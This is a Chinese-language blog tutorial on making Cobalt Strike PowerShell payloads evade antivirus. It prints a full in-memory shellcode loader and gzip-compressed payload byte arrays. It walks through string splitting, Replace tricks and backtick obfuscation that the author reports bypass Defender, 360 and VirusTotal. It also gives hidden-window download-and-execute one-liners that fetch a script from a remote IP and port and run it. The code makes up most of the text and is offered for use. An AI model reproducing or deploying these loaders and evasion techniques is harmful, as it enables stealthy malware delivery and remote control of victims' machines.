0x01 生成powershell腳本

前幾天看了Y4er大佬免殺思路文章驹止，我按照他的思路擴(kuò)展了下總結(jié)的方法給大家參考逃片，如有問(wèn)題請(qǐng)大佬執(zhí)教郑现。

首先通過(guò)Cobalt Strike生成的powershell腳本

圖片

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('此處為shellcode谷饿，太長(zhǎng)就不復(fù)制出來(lái)了')

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}
</pre>

然后直接運(yùn)行生成的powershell腳本，微軟的Defender跟360都直接秒殺了

圖片

0x02 Powershell免殺

現(xiàn)在把FromBase64String改成FromBase65String承耿，那就解決掉FromBase64String冠骄，直接改成byte數(shù)組。

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">$string = ''
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('【cs生成的shellcode】')
$s |foreach { $string = $string + $_.ToString()+','}</pre>

圖片

圖片

然后輸入$string查看轉(zhuǎn)碼后的值加袋，發(fā)現(xiàn)進(jìn)度條拉到頂都看不完凛辣。

圖片

此時(shí)把變量文件輸出到文件中查看，有些用戶權(quán)限不夠會(huì)報(bào)錯(cuò)职烧，更換路徑就行了扁誓。

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">$string > c:\1.txt</pre>

圖片

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [Byte[]](這里放剛剛轉(zhuǎn)碼后的FromBase65String)

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}
</pre>

運(yùn)行下防泵，測(cè)試是否能上線，可以看到是沒(méi)問(wèn)題的蝗敢。

圖片

接下來(lái)就是上VT查殺看看捷泞。https://www.virustotal.com

圖片

這樣還不能夠，繼續(xù)改關(guān)鍵字寿谴。

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">Set-StrictMode -Version 2

$DoIt = @'
function func_b {
    Param ($amodule, $aprocedure)       
    $aunsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.Uns'+'afeN'+'ativeMethods')
    $agpa = $aunsafe_native_methods.GetMethod('GetP'+'rocAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $agpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($aunsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($amodule)))), $aprocedure))
}

function func_a {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $aparameters,
        [Parameter(Position = 1)] [Type] $areturn_type = [Void]
    )

    $atype_b = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Reflect'+'edDel'+'egate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDeleg'+'ateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $atype_b.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $aparameters).SetImplementationFlags('Runtime, Managed')
    $atype_b.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $areturn_type, $aparameters).SetImplementationFlags('Runtime, Managed')

    return $atype_b.CreateType()
}

[Byte[]]$acode =  [Byte[]](這里放剛剛轉(zhuǎn)碼后的FromBase65String)

for ($x = 0; $x -lt $acode.Count; $x++) {
    $acode[$x] = $acode[$x] -bxor 35
}

$ava = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_b kernel32.dll VirtualAlloc), (func_a @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$abuffer = $ava.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $abuffer, $acode.length)

$arunme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($abuffer, (func_a @([IntPtr]) ([Void])))
$arunme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
    start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    i`ex $DoIt
}</pre>

先使用看有沒(méi)有改到不能上線锁右，再檢測(cè)免殺能力。

圖片

可以成功上線拭卿，再來(lái)測(cè)試免殺骡湖。VT完美免殺

圖片

0x03 生成無(wú)落地執(zhí)行Powershell文件

生成無(wú)落地執(zhí)行powershell文件

圖片

訪問(wèn)http://xxx.xx.xxx.xx:80/a這個(gè)連接看看文件內(nèi)容，并保存下來(lái)

圖片

查看VT峻厚，一列全紅，要是我買的股票這樣多好谆焊，扯遠(yuǎn)了惠桃，

圖片

使用上面方法，直接把FromBase64String改成FromBase65String辖试。

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">[Byte[]]$var_code =  [Byte[]](31,139,8,0,0,0,0,0,0,0,173,87,109,111,162,218,22,254,92,127,5,31,154,168,169,181,40,214,234,220,76,114,20,65,80,160,10,190,247,52,205,6,182,136,34,32,108,4,60,51,255,253,44,80,123,58,119,58,247,78,114,175,9,113,179,89,175,207,126,214,98,161,97,114,175,145,192,54,136,236,153,152,186,159,225,32,180,61,151,170,23,10,183,61,79,36,212,87,234,143,98,97,29,185,6,201,182,179,197,155,133,201,155,31,120,198,27,50,205,0,135,33,245,87,225,102,132,2,180,167,74,183,71,20,188,237,61,51,114,112,133,202,111,50,65,108,70,1,46,223,220,20,110,242,173,200,13,209,26,191,185,136,216,71,252,182,199,100,227,153,33,56,42,189,116,124,191,231,237,145,237,190,126,249,194,70,65,128,93,114,190,175,246,49,233,132,33,222,235,142,141,195,82,153,250,70,205,55,56,192,247,207,250,22,27,132,250,139,186,125,171,246,29,79,71,206,69,44,101,145,177,129,132,58,174,153,61,147,60,3,101,25,84,53,223,177,73,169,248,231,159,197,242,203,125,237,181,202,29,34,228,132,165,162,150,134,4,239,171,166,227)

$s=New-Object IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();</pre>

然后再丟到VT上面查看

圖片

不能夠啊辜王，還要繼續(xù)改，首先將byte數(shù)組分成兩個(gè)段罐孝。

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">[Byte[]]$var_c1 =  [Byte[]](31,139,8,0,0,0,0,0,0,0,173,87,109,111,162,218,22,254,92,127,5,31,154,168,169,181,40,214,234,220,76,114,20,65,80,160,10,190,247,52,205,6,182,136,34,32,108,4,60,51,255,253,44,80,123,58,119,58,247,78,114,175,9,113,179,89,175,207,126,214,98,161,97,114,175,145,192,54,136,236,153,152,186,159,225,32,180,61,151,170,23,10,183,61,79,36,212,87,234,143,98,97,29,185,6,201,182,179,197,155,133,201,155,31,120,198,27,50,205,0,135,33,245,87,225,102,132,2,180,167,74,183,71,20,188,237,61,51,114,112,133,202,111,50,187,110,247,28,92,199,128,115,15,33,42,160,68,249)
[Byte[]]$var_c2 =  [Byte[]](199,96,206,103,88,42,138,174,140,247,128,223,249,30,104,122,187,134,50,195,87,233,75,105,165,87,239,217,125,198,101,214,65,97,88,161,70,17,212,185,81,161,52,140,28,108,86,168,142,27,218,151,71,157,136,120,249,178,248,79,184,114,228,16,219,64,33,185,154,123,45,127,2,233,197,53,235,185,80,49,145,1,189,155,171,100,3,217,135,72,62,122,114,114,79,229,11,250,65,228,238,241,255,241,0,126,112,250,223,161,205,192,203,103,186,119,232,242,128,62,199,171,40,254,81,40,136,107,234,195,126,104,159,224,139,5,31,168,86,206,189,144,160,128,220,111,61,29,62,111,242,247,117,233,22,149,41,145,91,80,183,136,250,78,221,67,122,157,144,169,195,55,78,96,69,217,203,155,58,127,178,125,163,98,100,159,21,191,81,42,54,48,140,220,247,3,79,7,150,98,152,193,50,211,185,145,76,24,246,254,6,195,245,1,82,3,14,0,0)
$var_code=$var_c1+$var_c2

$s=New-Object IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();</pre>

老規(guī)矩使用命令看看是否影響上線

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://0.0.0.0:4545/text.txt'))"</pre>

注：這里有一點(diǎn)要注意呐馆，我把cobalt strike惡意代碼鏈接復(fù)制出來(lái)另存為一個(gè)txt，服務(wù)器另外起了一個(gè)http服務(wù)提供這個(gè)txt訪問(wèn)莲兢⌒诶矗可以看到上線成功了。

圖片中的命令跟上面我寫的命令不一樣是因?yàn)槲沂褂昧嘶煜@殺軟改艇，可以不管收班，后面會(huì)講。

圖片

這次還是不完美谒兄，差一個(gè)摔桦，都是命令沒(méi)有關(guān)鍵字替換，現(xiàn)在就是用混淆解決承疲。

圖片

先上線后查殺

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">[Byte[]]$var_c1 =  [Byte[]](31,139,8,0,0,0,0,0,0,0,173,87,109,111,162,218,22,254,92,127,5,31,154,168,169,181,40,214,234,220,76,114,20,65,80,160,10,190,247,52,205,6,182,136,34,32,108,4,60,51,255,253,44,80,123,58,119,58,247,78,114,175,9,113,179,89,175,207,126,214,98,161,97,114,175,145,192,54,136,236,153,152,186,159,225,32,180,61,151,170,23,10,183,61,79,36,212,87,234,143,98,97,29,185,6,201,182,179,197,155,133,201,155,31,120,198,27,50,205,0,135,33,245,87,225,102,132,2,180,167,74,183,71,20,188,237,61,51,114,112,133,202,111,50,65,108,70,1,46,223,220,20,110,242,173,200,13,209,26,191,185,136,216,71,252,182,199,100,227,153,33,56,42,189,116,124,191,231,237,145,237,190,126,249,194,70,65,128,93,114,190,175,246,49,233,132,33,222,235,142,141,195,82,153,250,70,205,55,56,192,247,207,250,22,27,132,250,139,186,125,171,246,29,79,71,206,69,44,101,145,177,129,132,58,174,153,61,147,60,3,101,25,84,53,223,177,73,169,248,231,159,197,242,203,125,237,181,202,29,34,228,132,165,162,150,134,4,239,171,166,227,20,203,212,247,114,230,112,146,250,184,84,148,109,35,240,66,111,77,170,115,219,101,234,213,105,30,189,146,7,47,159,99,47,150,47,153,89,62,130,60,126,157,100,102,245,172,83,42,194,114,4,216,116,206,24,22,43,212,75,230,239,229,245,149,250,227,61,26,53,114,137,189,199,85,209,37,56,240,124,13,7,71,219,192,97,85,64,174,233,96,21,175,65,173,24,194,241,185,86,177,12,65,4,152,68,129,75,93,99,1,189,163,183,195,165,91,55,114,156,10,216,125,249,93,187,175,37,5,199,87,112,127,87,169,244,81,9,164,70,36,40,87,46,156,248,29,56,228,156,55,103,115,144,206,79,209,127,32,87,25,126,63,17,172,92,248,94,248,132,170,38,118,176,133,8,126,35,128,239,7,174,22,110,110,94,242,37,134,124,74,35,47,180,115,189,175,20,93,161,100,8,2,17,47,72,179,227,156,4,17,46,191,254,115,62,103,183,87,205,176,242,75,67,181,171,214,69,231,124,60,231,56,190,82,47,51,207,54,95,11,55,229,194,133,61,217,254,155,30,217,142,137,131,236,249,175,171,161,135,215,182,139,123,169,139,246,182,113,37,124,233,179,51,195,107,7,231,120,84,175,98,10,196,89,42,94,30,96,179,119,65,167,152,1,250,242,179,26,183,183,201,187,110,247,28,92,199,128,115,15,33,42,160,68,249)
[Byte[]]$var_c2 =  [Byte[]](199,96,206,103,88,42,138,174,140,247,128,223,249,30,104,122,187,134,50,195,87,233,75,105,165,87,239,217,125,198,101,214,65,97,88,161,70,17,212,185,81,161,52,140,28,108,86,168,142,27,218,151,71,157,136,120,249,178,248,79,184,114,228,16,219,64,33,185,154,123,45,127,2,233,197,53,235,185,80,49,145,1,167,11,48,76,52,31,27,54,114,50,84,42,148,96,155,184,155,106,182,117,13,161,248,41,38,44,114,28,40,57,176,116,132,51,129,157,12,11,141,100,156,9,204,202,191,243,163,92,213,48,17,247,190,131,247,32,157,119,33,222,65,22,244,156,75,69,229,116,67,22,54,139,255,33,236,107,157,156,139,34,195,234,10,210,135,160,129,0,154,227,145,10,53,179,3,2,125,173,88,249,137,120,255,91,120,63,182,152,31,194,100,3,124,57,200,82,94,136,47,221,148,100,229,146,75,26,217,203,229,235,59,150,57,114,1,1,212,248,192,219,119,81,136,155,13,45,111,99,165,34,211,138,14,98,42,111,199,205,160,207,29,121,225,32,112,19,184,142,112,49,7,158,147,164,129,234,119,85,201,224,162,231,145,64,15,214,226,184,144,169,195,55,78,96,69,217,203,155,58,127,178,125,163,98,100,159,21,191,81,42,54,48,140,220,247,3,79,7,150,98,152,193,50,211,185,145,76,24,246,254,6,195,245,1,82,3,14,0,0)
$var_code=$var_c1+$var_c2

$s=New-Object IO.MemoryStream(,$var_code);$a1='IEX (New-Object IO.Strea123'.Replace('123','mRe');$a2='ader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()';IEX($A1+$a2)</pre>

老規(guī)矩邻耕，先上線后查殺。

圖片

上線成功燕鸽，沒(méi)有被殺的了兄世。完美

圖片

0x04 總結(jié)

VT確實(shí)免殺了，不過(guò)呢實(shí)際執(zhí)行的時(shí)候360跟defender還是會(huì)攔截（翻車現(xiàn)場(chǎng)绵咱，勿噴）碘饼，通過(guò)混淆執(zhí)行語(yǔ)句可以繞過(guò)熙兔，昨天試過(guò)了還沒(méi)問(wèn)題，今天寫文章發(fā)現(xiàn)defender的amsi更新了艾恼，沒(méi)有截圖住涉。文章的目的也不是直接給大家使用，不是最新版本的直接使用確實(shí)沒(méi)問(wèn)題钠绍，對(duì)于最新版的殺軟這里的思路還是可用舆声，只是需要加入更多的混淆，或者加一些編碼進(jìn)去柳爽。

0x05 擴(kuò)展

下面講下執(zhí)行遠(yuǎn)程執(zhí)行腳本時(shí)代碼混淆媳握，有的時(shí)候直接執(zhí)行cs生成的語(yǔ)句殺軟會(huì)攔截。

原始語(yǔ)句：

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://103.232.213.20:45685/text.txt'))"</pre>

最后我們就需要混淆下代碼了磷脯，可以使用Replace替換關(guān)鍵字部分字母蛾找，加上通過(guò)拆分后重新組合

例如：

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">powershell.exe -nop -w hidden -c "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://0.0.0.0:4545/text.txt'')'.Replace('123','adString');IEX ($c1+$c2)"</pre>

或者

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">powershell.exe -nop -w hidden -c "$c1='IEX(New-Object Net.WebClient).123'.Replace('123','Downlo');$c2='adString(''httaaa.213.20:45685/text.txt'')'.Replace('aaa','p://103.232/text.txt');IEX ($c1+$c2)"</pre>

還有powershell語(yǔ)言的特性來(lái)混淆代碼

常規(guī)方法：

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"</pre>

